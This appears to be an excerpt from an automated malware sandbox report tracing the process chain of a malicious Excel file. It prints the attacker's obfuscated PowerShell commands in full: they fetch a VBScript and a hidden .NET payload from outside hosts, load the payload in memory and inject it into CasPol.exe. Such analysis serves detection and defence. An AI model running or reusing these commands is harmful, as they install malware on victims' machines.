                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: pi-77159.xlsReversingLabs: Detection: 26%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENTJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA